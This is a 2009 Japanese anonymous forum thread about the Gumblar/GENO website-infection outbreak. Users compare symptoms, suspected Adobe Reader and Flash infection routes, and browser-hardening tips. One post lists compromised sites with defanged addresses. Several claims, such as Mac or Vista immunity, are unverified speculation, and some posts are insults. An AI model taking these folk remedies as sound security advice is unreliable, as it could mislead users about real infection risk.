09/05/15 23:43:38
sqlsodbc.chmが改変されてるって事はコレを読み取り専用にしときゃOK?
441:名無しさん@お腹いっぱい。
09/05/15 23:45:34
>>434
VISTAは大丈夫だって
442:名無しさん@お腹いっぱい。
09/05/15 23:46:08
Vista=ゆとり
443:357
09/05/15 23:46:23
>>440
感染の症状の一つをブロックできたらOK? なわけないじゃん。
風邪になって、熱はあるし、咳もでてフラフラだけど、くしゃみが出ないからOK! なわけないじゃん。
444:名無しさん@お腹いっぱい。
09/05/15 23:46:53
>>441
ありがとうございます
445:名無しさん@お腹いっぱい。
09/05/15 23:48:02
PDF-XChange Viewer - Portable v.2.04105
これだな
ポータブル版は古いヴァージョンのしかないのか……
大丈夫かな?
446:名無しさん@お腹いっぱい。
09/05/15 23:51:20
>>445
「コレを使えば/やっておけばもう安心!」が最大のセキュリティホールなのをよく覚えておけ
あんまり古いのはあんまり良くないかもな
447:名無しさん@お腹いっぱい。
09/05/15 23:52:57
WINDOWSを最新にアップデートしててもクソの役にも立たなかったということですね
448:名無しさん@お腹いっぱい。
09/05/15 23:53:48
GENO社員うぜ~
449:名無しさん@お腹いっぱい。
09/05/15 23:54:10
管理下のサイトが感染してた…
もちろん俺のPCも
更新日時を見ると12日だから約3日…
改ざんされたのは1日10PV程の糞サイトだけど、うつした人ゴメンなさい
450:名無しさん@お腹いっぱい。
09/05/15 23:54:48
>>449
ここではなくサイトに明記しろ。
451:名無しさん@お腹いっぱい。
09/05/15 23:56:56
>>449
感染したPCの詳細を
452:名無しさん@お腹いっぱい。
09/05/15 23:58:01
感染はしてないけど一端サイト閉めようかな…沈静化するまで
453:名無しさん@お腹いっぱい。
09/05/15 23:58:37
>>452
その方がいいと思う
あと、PCの詳細を
454:名無しさん@お腹いっぱい。
09/05/15 23:58:51
>>450
そうなんだけど
今はとりあえずアク禁にしてある
もう少し状況がはっきりしないと
謝りの文あげるのも怖い
455:名無しさん@お腹いっぱい。
09/05/15 23:59:00
パンツがヌルヌルになってきたぜ
456:名無しさん@お腹いっぱい。
09/05/16 00:01:27
>>453
XPです。XP。
457:名無しさん@お腹いっぱい。
09/05/16 00:01:28
>>449
CDブートのOSで謝罪文を載せたりFTPのパスを変更してみたらどうだろう
458:名無しさん@お腹いっぱい。
09/05/16 00:01:28
>>454
ところで、何から書き込んでるの?
459:名無しさん@お腹いっぱい。
09/05/16 00:02:54
あと、感染PCから見たグーグルの検索結果まで好き勝手に書き換えるくらいなんだから、
レジストリエディタが起動するから大丈夫とか、安易に考えない方が身のため他人のためになると思う。
TypeA ヘルプファイル書き換え
TypeB ヘルプファイル書き換え & レジストリエディタ起動阻止
とかが、あり得る。
攻撃者は時期を見計らいTypeB から TypeA へ替えることで、発見を遅らせることくらい考えていそう。
460:名無しさん@お腹いっぱい。
09/05/16 00:05:00
URLリンク(www.itmedia.co.jp)
「男の子牧場」炎上、「牧場メーカー」「女の子牧場」などパロディサイト乱立
サイバーエージェントが5月13日に公開した携帯電話向けサイト「男の子牧場」に
対して「男性差別だ」などと批判が殺到し、広報担当者のブログが炎上している。
男の子牧場のパロディサイトも乱立。ネット上で騒ぎになっている。
461:名無しさん@お腹いっぱい。
09/05/16 00:06:30
なんか
【管理も】同人サイト・GENOウィルス注意【閲覧も】
スレリンク(doujin板)
↑こっちみると、凄い勢いで感染サイト増えてない?
462:名無しさん@お腹いっぱい。
09/05/16 00:07:25
動画サイト経由だろ
463:名無しさん@お腹いっぱい。
09/05/16 00:08:10
増えてるな
ひどい有り様だ
464:名無しさん@お腹いっぱい。
09/05/16 00:08:15
仮想マシンにWin2kPro入れて感染する環境を作りたいんだけど、何入れたらいい?
465:名無しさん@お腹いっぱい。
09/05/16 00:09:15
OCZ Vertex 30GB
というキーワードでググッタ時にトップに来る、有名どころの自作PCのブログなんだけど、
アクセスしたら
lolipop.ジェーピー
の情報をブラウザが読み込んで来るんだが、大丈夫だろうか?
仮にこのサイトがやばいとすると、相当数の自作PCユーザーが冷や汗もんなんだが・・・。
だれか、分かる人頼む。
466:名無しさん@お腹いっぱい。
09/05/16 00:09:56
>>414
adobe readerだから
467:名無しさん@お腹いっぱい。
09/05/16 00:10:00
>>451
XPで数日まえサイトの更新をしようとFFTPを立ち上げたけど上手く繋がらず
仕方ないからレンサバのファイルマネージャーで更新した
今日、avast入れてるPCでたまたま見たら凄い怒られた
サイトの改ざんはindex.htmlとModxのなかのphpが10こほどやられてた
いつ自分が感染したか知る方法はないの?
468:名無しさん@お腹いっぱい。
09/05/16 00:10:43
>>416
そもそも古過ぎてそういう機能が無いから設定項目があるわきゃない。
469:名無しさん@お腹いっぱい。
09/05/16 00:11:09
>>458
携帯
470:名無しさん@お腹いっぱい。
09/05/16 00:12:06
>>461
前から感染してたのを同人板の連中が気づかなかっただけ
471:名無しさん@お腹いっぱい。
09/05/16 00:12:59
>>470
それ、よけいまずいじゃんwww
472:名無しさん@お腹いっぱい。
09/05/16 00:14:28
>468
おかげで感染せずに済んだ
473:名無しさん@お腹いっぱい。
09/05/16 00:17:20
>>414
先にgumblar.cnに行って
JSクラックPDFをダウンロードして感染
474:名無しさん@お腹いっぱい。
09/05/16 00:19:19
同人板読んできたけど、同人用語がわけわからんw
475:357
09/05/16 00:20:08
今、思い出したけど、Flashって
複数のブラウザ使っているなら、それぞれで最新にしないとダメだぞ。
IEのを最新にしてもFirefoxのは古いまま という仕様だからな。
■■■■■テンプレ希望■■■■■
Flash Player はブラウザごとに最新であることを確認してください。
IEで最新でもFirefoxは古いままだったり、その逆もあります。
476:名無しさん@お腹いっぱい。
09/05/16 00:20:23
なにげに入れといて良かったな、No Script
これからもお世話になるか
477:名無しさん@お腹いっぱい。
09/05/16 00:21:16
家族共用パソコンだから感染したら被害がとんでもないことになる件 しばらくはIE使わないほうがいいな
478:名無しさん@お腹いっぱい。
09/05/16 00:22:03
adobe reader消したらとりあえず安心なん?
479:名無しさん@お腹いっぱい。
09/05/16 00:22:06
>>477
できればIEはずっと使わないほうがいんじゃね?
俺はmicrosoftupdate以外では全く使わない。
480:名無しさん@お腹いっぱい。
09/05/16 00:23:10
NoScript + ABP 最強
481:名無しさん@お腹いっぱい。
09/05/16 00:24:31
自分のパソコンはvistaだからいいが職場のパソコンが気になる
だからと言って上司に「ウイルス流行ってますよ」って言ってもどうにもならんだろうし
482:名無しさん@お腹いっぱい。
09/05/16 00:24:45
最終的にadobeが感染したら面白いな
483:名無しさん@お腹いっぱい。
09/05/16 00:24:50
メインPCをメンテ中(M/B等を換装)、サブのノートPC(Win2k SP4)を数日間使用していたが、
見事に感染していた。
×sqlsodbc.chmを改変
WINNT\system32に在ったが、ハッシュは合っていた。
○cmd.exe、regedit.exeが起動不能
ついでにregedt32.exeも起動不能。
?一部のアンチウイルスソフトが更新不能
殆ど使用していないノートPCだったので、そもそもアンチウイルスソフトの類をインスコしていなかった。
○特定サイトにアクセス不能
Microsoft Update、Windows Update共に繋がらない。
?ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
確認方法が分からない…。
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD
484:名無しさん@お腹いっぱい。
09/05/16 00:26:18
>>483
IE / AcrobatReader / Flash Playerのバージョン詳しく!
485:名無しさん@お腹いっぱい。
09/05/16 00:27:42
>>482
いっぺん痛い目見れば
今度から対応早くなんじゃね
486:名無しさん@お腹いっぱい。
09/05/16 00:29:11
adobeは自社製品を使ってなかったりw
487:名無しさん@お腹いっぱい。
09/05/16 00:29:12
Mac OS X10.5.7ですけど大丈夫でしょうか?
心配です
488:名無しさん@お腹いっぱい。
09/05/16 00:29:29
つーかいつもアドビが…
489:名無しさん@お腹いっぱい。
09/05/16 00:29:53
>>487
巣に帰れ
490:名無しさん@お腹いっぱい。
09/05/16 00:30:38
>>479
一応姉と妹にも注意したほうがいいといってはおいたが、二人ともニコ厨だからもし草動画が感染したら…((((;゚Д゚)))ガクガクブルブル
それはそうとJaneStyleで画像以外のURLをクリックした時にすぐにIEに飛ばないように設定するにはどうやるんかヨクワカラン
491:名無しさん@お腹いっぱい。
09/05/16 00:31:28
>>489
ジャバスクリプトはMacでも動くんです....
492:名無しさん@お腹いっぱい。
09/05/16 00:31:39
>>1でブクマ推奨してるサイトはそんな情報あるわけでもないようだが
なんで推奨になってんの?本人?
まとめWikiこそ>>1の一番上にもってきなよ
過去スレリンクなんか>>2以下でいいんだし
493:名無しさん@お腹いっぱい。
09/05/16 00:32:29
>>490
ツール→設定→パス→ブラウザ
これで指定してあげればいいよ
494:名無しさん@お腹いっぱい。
09/05/16 00:33:08
変なexe踏まなきゃ大丈夫って時代は終わったのだね。
495:名無しさん@お腹いっぱい。
09/05/16 00:33:38
>>491
JavaScriptは動いてもMac上ではexeが勝手に動かないから大丈夫だよ
496:名無しさん@お腹いっぱい。
09/05/16 00:33:51
>>491
巣に帰れ
497:名無しさん@お腹いっぱい。
09/05/16 00:35:08
もうやだこんなインターネッツ
498:名無しさん@お腹いっぱい。
09/05/16 00:35:50
コピペブログあたりがコピペしてくれたら注意喚起になりそうだが…
499:名無しさん@お腹いっぱい。
09/05/16 00:36:22
>>492
圧力がかかって該当記事削除された。このスレと前スレ読み返せ
500:483
09/05/16 00:36:23
>>484
スマソ、途中で送信してしまった…。
メインPCをメンテ中(M/B等を換装)、サブのノートPC(Win2k SP4)を数日間使用していたが、
見事に感染していた。
×sqlsodbc.chmを改変
WINNT\system32に在ったが、ハッシュは合っていた。
○cmd.exe、regedit.exeが起動不能
ついでにregedt32.exeも起動不能。
?一部のアンチウイルスソフトが更新不能
殆ど使用していないノートPCだったので、そもそもアンチウイルスソフトの類をインスコしていなかった。
○特定サイトにアクセス不能
Microsoft Update、Windows Update共に繋がらない。
?ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
確認方法が分からない…。
?Googleの検索結果を改竄(リンクを弄る)
確認方法が分からない…。
○explorer.exeや一部のブラウザが異常終了
一昨日、iexplorer.exe(IE6)が異常終了した覚えがある。
×Acrobatが勝手に起動
Adobe Reader等のPDFリーダーはインスコしていなかった。
Flashで感染?(ここ半年、更新した記憶が無い…。)
×PDFファイルやシステムファイルが増殖
△CPU、メモリ使用率がUP
iexplorer.exe(IE6)のCPU使用率が常に50%以上。
×再起動時にBSOD
501:名無しさん@お腹いっぱい。
09/05/16 00:37:45
>>487
小林製薬 (4967) は12日、同社のホームページが何者かによっ
て改ざんされ、ホームページにアクセスするとウィルスに感染す
るようになっていたとして、ウィルス感染が判明したホームページを当面の間、閉鎖したことを発表した。
同社によると感染が明らかになったホームページは「暮らしの
ヒントお知らせ隊(URLリンク(hint.kobayashi.co.jp))」「ハナノ
ア ブランドサイト(URLリンク(hint.kobayashi.co.jp)
)」「イージーファイバー ブランドサイト(URLリンク(hint.kobayashi.co.jp)) 」の3つ。
それぞれ、5月9日5時27分から5月11日21日27分までこれらのホーム
ページにアクセスした人は、ウィルスに感染した可能性があるとして、感
染の有無を確認するように呼びかけている。
ウィルスに感染した場合、sqlsodbc.chmの改変、コマンドプロンプト
が起動不能、レジストリエディタが起動不能などの症状が発生するとしている。
尚、同社ではMacとWindows Vistaに関してはこのウィルスには感染する恐れはないとも述べている。
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
URLリンク(www.technobahn.com)
502:名無しさん@お腹いっぱい。
09/05/16 00:37:58
>>495
ありがとうございます
>>496
おまえはビルゲイツのけつの穴でもなめてろ
503:名無しさん@お腹いっぱい。
09/05/16 00:39:34
>>502
なんかむかつく
504:名無しさん@お腹いっぱい。
09/05/16 00:39:47
>>502
死ねage厨
505:名無しさん@お腹いっぱい。
09/05/16 00:40:03
>>493
だめだ どうでもいいファイル指定しても勝手にIEに飛んでしまう\(^o^)/ せめてIEを使うことを警告してくれればいいのに っていうかIEしかない件
506:名無しさん@お腹いっぱい。
09/05/16 00:40:06
MicrosoftのWindows Updateのサイトは大丈夫なのかねえ。
Windows Updateも命懸けででやらないと。と不安になってきた。
507:名無しさん@お腹いっぱい。
09/05/16 00:40:43
痛ニューとかハム速あたりで宣伝してくれねーかなあこのウィルス
これだけ被害増えてるのに認知度が低いどころか皆危機感がない
( ´_ゝ`)フーン
で済まされる
508:名無しさん@お腹いっぱい。
09/05/16 00:41:35
>>505
じゃあさーIEいっかいけして他のに対応させてまたIEいれたらいいじゃん
509:名無しさん@お腹いっぱい。
09/05/16 00:42:24
>>501は12日時点での情報だし亜種がMacやVistaを狙わないとは限らないわけで
510:名無しさん@お腹いっぱい。
09/05/16 00:42:48
>>507
NHKニュースでトップ扱いクラスなんだがな。
どこのマスコミも無視しやがるわ。
511:名無しさん@お腹いっぱい。
09/05/16 00:43:05
>>505
ファイル?
ちゃんとブラウザを指定してる?それこそ狐とか。
512:名無しさん@お腹いっぱい。
09/05/16 00:43:44
>>510
国家レベルのやつが感染したらニュースになるねー
513:名無しさん@お腹いっぱい。
09/05/16 00:44:47
>>505
プロキシ設定でどうやっても通らないやつを指定してみたらどう?
514:名無しさん@お腹いっぱい。
09/05/16 00:45:05
>>508
家族共用パソコンなんで親父のアカウント権限が無いと導入できない件 URLを見ると反射的にクリックする癖をいい加減直さんと
515:名無しさん@お腹いっぱい。
09/05/16 00:45:06
>>510
豚ちゃん優先なんだろね
516:名無しさん@お腹いっぱい。
09/05/16 00:45:35
>>512
それでは遅いんだがな、危機感がないのはいつものことか
517:名無しさん@お腹いっぱい。
09/05/16 00:45:47
家族に言っても誰も反応ねえ…
勝手にPG2ぶちこむわけにいかないしとりあえず
あどべJavaSオフとフラッシュ最新にしといてあげればいいよね
518:名無しさん@お腹いっぱい。
09/05/16 00:45:52
そいやセカンドPCに入れてるAVGって ZlkonやGumblarに対応しとるんかな…
519:名無しさん@お腹いっぱい。
09/05/16 00:46:25
>>509
VistaはともかくMacなんて相手にもされてないからw
520:名無しさん@お腹いっぱい。
09/05/16 00:46:38
フラッシュプレイヤー最新版にしたいのに
インスコできない(´;ω;`)
activeX許可した途端にブラウザ真っ白になって固まる
521:名無しさん@お腹いっぱい。
09/05/16 00:47:01
>>514
もうどうしようもなくね!?
オヤジに頼むしかなくね?
522:名無しさん@お腹いっぱい。
09/05/16 00:47:04
>>518
既出なら対応
亜種新種はどのソフトも無理
523:名無しさん@お腹いっぱい。
09/05/16 00:47:48
>>1のサイトがいつなくなるかもわからないので、
現在感染中のサイトを転載しておく
p-frying■com/
www■zengozen■co■jp/
www■beauty-wed■co■jp/
skyhighpremium■com/
sound■jp/yudai_marimba/
www■thesis-report■com/
www■joyjoynet■com/
www■ti-a-ra■com/
www1■odn■ne■jp/revue1999/
www■nifty-hair■com/
524:名無しさん@お腹いっぱい。
09/05/16 00:48:42
>>523
乙
こんなにあるのか
525:名無しさん@お腹いっぱい。
09/05/16 00:48:45
そろそろ手動で駆除する方法を考えようじゃないか
526:名無しさん@お腹いっぱい。
09/05/16 00:49:03
>>520
URLリンク(fpdownload.macromedia.com)
527:名無しさん@お腹いっぱい。
09/05/16 00:50:10
>>319
あるよ
528:名無しさん@お腹いっぱい。
09/05/16 00:50:48
コードギアススレに貼られていたんだが
529:名無しさん@お腹いっぱい。
09/05/16 00:51:02
>>522
㌧
亜種の件もあるから、設定とか見直してくる!
530:名無しさん@お腹いっぱい。
09/05/16 00:51:42
>>514
そもそも、制限ユーザなら感染しなくね?
531:名無しさん@お腹いっぱい。
09/05/16 00:51:44
更新するやつが押しかけてサイト重くなってんじゃねーの
532:名無しさん@お腹いっぱい。
09/05/16 00:51:50
>>510
自分達が廃れ始めた原因の一つであるインターネットが、この件で少しは廃れてくれればとでも思ってるんじゃね?
533:名無しさん@お腹いっぱい。
09/05/16 00:53:50
>>501
詳しい情報ありがとうございます
>>519
おまえはパルマーのちんちんでもしゃぶってろ
534:名無しさん@お腹いっぱい。
09/05/16 00:54:08
ニュー速+で記事にしてくんないかな
535:名無しさん@お腹いっぱい。
09/05/16 00:54:34
心配しすぎて寝れない
536:名無しさん@お腹いっぱい。
09/05/16 00:54:58
>>533
巣に帰れよ基地外
537:名無しさん@お腹いっぱい。
09/05/16 00:55:14
>>536
荒らしに構うなよ
538:名無しさん@お腹いっぱい。
09/05/16 00:55:51
>>530
mjk よくわからんが解説頼む
539:名無しさん@お腹いっぱい。
09/05/16 00:56:22
亜種がどんどん作られたらどうしようもなくなる
540:名無しさん@お腹いっぱい。
09/05/16 00:56:55
sodbc.chmのサイズって、どこみたらいいの?(XPの場合)
サイズ:1.29KB(1323バイト)
ディスク上のサイズ:4.00KB(4096バイト)
になってる。
ハッシュ値も違ってるし、どっちにしても感染確定だorz
cmdもregeditも立ち上がるから亜種なのかも…?
そしてちょっとPCの挙動がおかしい
スタートアップに入れてたソフトがいきなり消えたり…
541:名無しさん@お腹いっぱい。
09/05/16 00:58:00
>>540
>>459
542:名無しさん@お腹いっぱい。
09/05/16 00:58:02
Vistaもマックも目くそ鼻くそだろ
543:名無しさん@お腹いっぱい。
09/05/16 00:58:43
>>540
該当ファイルを右クリック→プロパティで見れないか?
それにしてもちょっと危ないなそれ
ソフト消えるとかは危険なにおい
544:名無しさん@お腹いっぱい。
09/05/16 00:59:05
readerアンインスコすればかなり感染率下がる?
545:名無しさん@お腹いっぱい。
09/05/16 00:59:49
>>540
タスクマネージャー見て増えたプロセスを右クリックで停止してcmd.exe使ってHDDからそのプロセスを消した後、システム復元かけてみたら?
546:名無しさん@お腹いっぱい。
09/05/16 01:00:01
>>540
>スタートアップに入れてたソフトがいきなり消えたり…
これはかなり疑わしい
547:名無しさん@お腹いっぱい。
09/05/16 01:01:50
こういうウィルス作る目的ってなんなんだろう
548:名無しさん@お腹いっぱい。
09/05/16 01:02:20
■現在、自作PC板ではアスペル(アスペルガー症候群)、
MACオタ、あっち糞、ダプオ(脱糞男)などの名で知られ、
AMD中傷を行っています。
549:名無しさん@お腹いっぱい。
09/05/16 01:02:45
・クレカ情報うまうま
・俺SUGEEE
・卒業制作
550:名無しさん@お腹いっぱい。
09/05/16 01:03:07
メモ
Firefox:
noscriptを入れて信用できるサイト毎に許可してあげるのが無難
Opera9.xx:
Operaは設定が少々ややこしいが、noscriptみたいなアドオンを入れなく
ても似たような事ができる(以下参照)
ウインドウ下部を右クリックしてカスタマイズを選ぶ
ボタンタブに切り替える
Java、JavaScript、Cookie、プラグイン、リファラなど好きな機能を選び
ウインドウ下部にドラッグして置いていく
これで好きなときに各機能をon/offしてWebを閲覧することができる(普
段は全offにしておくことが望ましい)
信頼できるサイト等、常に機能をonにしておきたいサイトはツール→クイ
ック設定→サイト毎の設定でサイト毎に許可設定してあげればおk
↑のサイト設定の管理(削除・変更等)はツール→詳細設定→コンテンツ
でできる
w3m:
w3m本体とw3mが使ってるcygwin関連のDLL (cygcrypt,cygiconv,cygintl,
cygssl,cygwin1)を同じフォルダに放り込んでおけばcygwinをインスコし
なくてもw3mを使える(一部制限あり)
読み物主体のWebを閲覧するならこれで見るのが安全(マイナーだしw)
ちなみに\Documents and Settings\User\.w3m\にw3mの設定ファイルが作
られる
ねこだいすき
551:名無しさん@お腹いっぱい。
09/05/16 01:03:23
豚インフル騒ぎよりも恐ろしく感じる自分
552:名無しさん@お腹いっぱい。
09/05/16 01:03:49
>>512
政府関連やマスコミ関連サイトで大々的に感染して
やっと動くってところだろうな
553:名無しさん@お腹いっぱい。
09/05/16 01:04:15
>>500
readerなくて感染した例
554:名無しさん@お腹いっぱい。
09/05/16 01:04:53
>>538
いまのところ、強制ダウンロードさせられたウィルスファイルをAdobeの穴経由で
実行させられて、sqlsodbc.chmの改変と%Root%に不正ファイルをおいてドライバ
登録させられるってのが感染メカニズムだから、強制ダウンロードされたのが
制限ユーザなら、それから先のメカニズムは制限ユーザには実行できない
はずなのさ。
555:名無しさん@お腹いっぱい。
09/05/16 01:05:08
>>552
朝日でも感染すればいいのに・・・
556:名無しさん@お腹いっぱい。
09/05/16 01:05:24
そんなに怖いならネットに接続しなきゃいい
557:名無しさん@お腹いっぱい。
09/05/16 01:05:32
>>552
それじゃあ遅いのにね~
豚インフルも大変だとおもうけどこっちも報道して欲しいわ
558:名無しさん@お腹いっぱい。
09/05/16 01:07:21
>>513
すまん自己解決した IEではなくJane2chに設定したら飛ばずにアドレスの色が変わるだけで済んだ
559:名無しさん@お腹いっぱい。
09/05/16 01:07:25
前スレでAdobe Readerが勝手に起動したって書いたんだけど
・sqlsodbc.chmを改変 →一応ファイルサイズは50,727 bytes
・cmd.exe、regedit.exeが起動不能 →起動した
・一部のアンチウイルスソフトが更新不能 →ノートン2009は更新できてる
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト) →Windows Updateにアクセスできる
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集 →?
・Googleの検索結果を改竄(リンクを弄る) →怖くて飛べない
・explorer.exeや一部のブラウザが異常終了 →IE、firefox、operaは普通に終了できた
・Acrobatが勝手に起動 →★★★★★どのサイトかは覚えてないがAdobe Reader7.0が起動された★★★★★→Acrobat JavaScriptは切ってなかった
・PDFファイルやシステムファイルが増殖 →どこを確認すれば?
・CPU、メモリ使用率がUP →特に変化なし
・再起動時にBSOD →普通に再起動できた
ニフのオンラインスキャンもやってみたけど白でした
勝手にAdobe Readerが起動するのって検索結果に普通のpdfファイルが出てそれをクリックしたって事もあるんだよね?
どのサイトを見てた時なのか全然覚えてないのが何とも・・・
560:名無しさん@お腹いっぱい。
09/05/16 01:07:52
スレリンク(hack板)
あしたおっぱいバレー観に行くカナ 2171
561:名無しさん@お腹いっぱい。
09/05/16 01:08:06
対策をしてるとはいえお気に入りの所ががいつ感染してるかとおもうと…
正直豚よりこっちのが怖い
個人サイトではとりあえず宣伝してくれようとしてくれるみたいだけど
どこまで広がるもんかねえ
562:名無しさん@お腹いっぱい。
09/05/16 01:09:39
Adobe Reader入れてなくても感染するって
どこから?
563:名無しさん@お腹いっぱい。
09/05/16 01:10:39
Flashから
564:名無しさん@お腹いっぱい。
09/05/16 01:10:45
>>550
ねこだいすきww
565:名無しさん@お腹いっぱい。
09/05/16 01:11:28
自称玄人がいっぱいのスレw
566:名無しさん@お腹いっぱい。
09/05/16 01:12:19
色んなサイトがフラッシュつかってるから完全に消すことできないじゃないか
567:名無しさん@お腹いっぱい。
09/05/16 01:12:54
Adobe Reader消せば
とりあえず危険は半分
568:名無しさん@お腹いっぱい。
09/05/16 01:13:41
>>500
GENOとは無関係なんじゃね?
違うウィルスかも。
569:名無しさん@お腹いっぱい。
09/05/16 01:14:38
なんでadobeがいつも狙われてるの?
570:名無しさん@お腹いっぱい。
09/05/16 01:14:56
なんでもいいがIE8が安定しない
571:名無しさん@お腹いっぱい。
09/05/16 01:15:27
653 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 01:02:14
ウイルスごときでなんでここまで騒いでるのか分からん
658 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 01:12:07
>>653
ニートはネットがないと困るからだろw
572:名無しさん@お腹いっぱい。
09/05/16 01:16:18
ネット使わない仕事なんて今時あるの?
573:名無しさん@お腹いっぱい。
09/05/16 01:16:33
>>569
クソ高いソフトの値段に切れたとか
574:名無しさん@お腹いっぱい。
09/05/16 01:16:59
おまいら祭ですね
575:名無しさん@お腹いっぱい。
09/05/16 01:17:09
バックアップ取るくらいしか無いな
js切ったら動画見れないしw
576:名無しさん@お腹いっぱい。
09/05/16 01:17:31
>>565
>>565
>>565
>>565
>>565
577:名無しさん@お腹いっぱい。
09/05/16 01:17:54
>>571
クレカ情報筒抜けやら
自分のサイトで感染者ふやされたら嫌だろ普通
578:名無しさん@お腹いっぱい。
09/05/16 01:18:34
感染したか調べようと思ってavastインストールしたんだけど
再起動かかったら起動しなくなったorz
ビープ音が鳴ってるんだけどこれってパソコン自体の問題?
それとも感染したってこと?
ちなみにこれは別のパソコンから書き込んでます。
579:名無しさん@お腹いっぱい。
09/05/16 01:18:50
Adobe Reader最新版てヴァージョンなに?
580:名無しさん@お腹いっぱい。
09/05/16 01:18:55
今後の展開によってはν速民の「ニコニコにアクセスした形跡のあるパソコンが完全にぶっ壊れるウイルスでもないかしら」という願いがある意味実現したともいえるw
581:名無しさん@お腹いっぱい。
09/05/16 01:19:24
>>550
今回のは信用できるサイト閲覧も感染する可能性があるので困ってしまう。
w3mの他にもっとマイナーなHTML2と言うのがある。
Windowsへ何も考えずとも普通にインストール出来る。
但し使い心地はw3mより激しく悪し。
582:名無しさん@お腹いっぱい。
09/05/16 01:20:00
>>579
9.1.1
583:名無しさん@お腹いっぱい。
09/05/16 01:20:50
糞みたいな質問スルーしろよ
584:名無しさん@お腹いっぱい。
09/05/16 01:20:57
,-=;,
{__7!
〔_ラレ ,、_,-‐y;
`y"l rヲレへシ'"
iト-ヘ、 (_;フイ r;_/iレソ
l 'ヽ ル || し ン′
ヽ ヽ レ' ||! 人_フ
V ヽ, | |.| r‐-、=‐-、 _/ /
ヽ ヽ, ト = }{i y=‐'~Y__ 〉 / /
`i 、, ヽ, }- ルハjト'`_ント∠-r' シ´ ←Vista
V `;| i∨  ̄~7 ン〈___/
V丶 | リ >, ( _/ ,_
ヾ { ソ レ ン ;_ン'" ,r" rn ゞミヽ
ゝ、ゝ = 〃ソノ__/ / y''J | \` ヽ
rn, rfレ`ー-=-‐''~ ̄ /`7 `、| ヽ-'ヽ
rJllル7 rnh; l´ ´'リ ,rn / r'ン==ト、!__ V ヽ
〉__ソ ヾヽ``ij'l 〉 /、,ハjjj し'l mhレ' /f, |リ<レ7,,m〉 | |
| { rfjn ,;'V _ン',/ //〉r>,、__//リリ ト 〈 }'=‐' ソ 〉トii,_/ j
585:名無しさん@お腹いっぱい。
09/05/16 01:21:15
>>582
なんて不吉な数字なんだ
586:名無しさん@お腹いっぱい。
09/05/16 01:21:21
>>569
使ってる人が多ければそれだけ感染拡大するからじゃね?
587:名無しさん@お腹いっぱい。
09/05/16 01:23:25
ビープ音は長符と短符の組み合わせでエラーコードになってるから
どんな風に鳴ってるのか書いたら誰か教えてくれるよ
あとBIOSも
588:名無しさん@お腹いっぱい。
09/05/16 01:26:32
パソコンド素人なんだけど
Adobe readerとフラッシュリーダー最新にアップデートと
ジャバスクオフが対策ってかかれてたから
リーダーの9.1インストールしてきたんだけど
もしかしてリーダーもフラッシュもインストールしないほうがいいの?
両方ない場合pdfとフラッシュ何で再生してんだろ…
589:名無しさん@お腹いっぱい。
09/05/16 01:27:31
必要なら入れるしかないだろ
590:名無しさん@お腹いっぱい。
09/05/16 01:28:01
参考になるかどうか分からんけど
メインノート Vista Home Premium SP1 CPU Centurino Duo メモリ1G→2G積み替え
Updateは NET Framework3.5 / IE8 以外のオプションも含めて最新
Acrobat Reader / Flash Player 最新
FW OutPost Free + Windows FW (Comodo は相性悪くて断念、Online Armourはインスコしたことないのでコメント出来ず)
常駐 Avast!、AntiVir、AVG、A-Squared(去年キャンペーンで貰った一年有償版)、Windows Defender
(競合は今のところなし ただAntiVirは キャンペーンで貰ったキーでPremium をインスコ直後に不具合発生、Freeに戻す
※avast!のWeb Guardが原因? 切って入れ直すか検討中)
URLリンク(www.dotup.org)
非常駐 Bitdefender cmd版 SuperAntiSpyware Ad-Aware AE(常駐 オフ) SpywareBlaseter Spybot(Tea-timerオフ)
その他 Rootkit削除系ソフトもろもろ
ルータ Zilkon GumblarのURLはじく設定 (10個しか入れられないので危険度が高い 78~/94~/213~をメインに登録)+ヤバいポート塞ぐ
Hosts や A-Squared に危険サイト名を登録済
Firefox + Adblock Plus + No Script + Flash Killer (Adblock Plus に危険URL登録済)
念のためOpera Turbo と Google Chromeもインスコ
以下明日以降やるつもり/検討中
OutPost を PC Tools に切り替えるか否か/PeerGuardian (Vista対応 Ver.)の導入
PARAGONでCとDドライブをイメージディスク化→外付HDDに保存/7月末に切れるA-Squredに代わって ThreatFire 導入
「AirG PC監視」 「フォルダ監視」(共にソフト名)、対キーロガーソフトの導入
サブノートのXP HOME SP3 celeron / 768M は AntiVir Premium(最近キャンペーンで貰った半年有償版)
+ ZoneAlarm Pro (去年キャンペーンで貰った一年有償版)の点以外は大体Vistaと同じ
591:名無しさん@お腹いっぱい。
09/05/16 01:28:06
>>547
カネと自尊心
592:578
09/05/16 01:28:15
>>587
ありがとうございます。
ビープ音はピーピーピーピーと4連続、これをずっと繰り返してます。
画面は真っ暗で何も起動しません。
593:名無しさん@お腹いっぱい。
09/05/16 01:28:35
>>588
フラッシュはインストールしなきゃ見れないよ
PDFも何かしらの閲覧ソフトがなきゃだめ
どれが安全というのは結局古かったら意味がないから
あんまりないとおもう
594:名無しさん@お腹いっぱい。
09/05/16 01:28:53
最近やたらとパソコン重いんだよな…大丈夫かな
今外出先で確認できんorz
595:名無しさん@お腹いっぱい。
09/05/16 01:28:56
カスペで何か出てきた…
スキャン終わるの怖い
596:名無しさん@お腹いっぱい。
09/05/16 01:29:34
>>547
ビジネスだね
ゾンビ化させてネットワーク作ってそれごとマーケットで
売られてたりするよ
597:名無しさん@お腹いっぱい。
09/05/16 01:29:43
チキン野郎ばっかり
598:名無しさん@お腹いっぱい。
09/05/16 01:31:13
>>592
BIOSなに?
599:名無しさん@お腹いっぱい。
09/05/16 01:31:31
なるほど
あっちの板から誘導するとこんなのが湧くわけか・・・
600:名無しさん@お腹いっぱい。
09/05/16 01:31:42
早めに報道されりゃ感染するパソコンも少なくなるだろうに
601:名無しさん@お腹いっぱい。
09/05/16 01:32:21
vistaにしよう
Silverlightにしよう
602:名無しさん@お腹いっぱい。
09/05/16 01:36:15
小林製薬覗いたから\(^o^)/
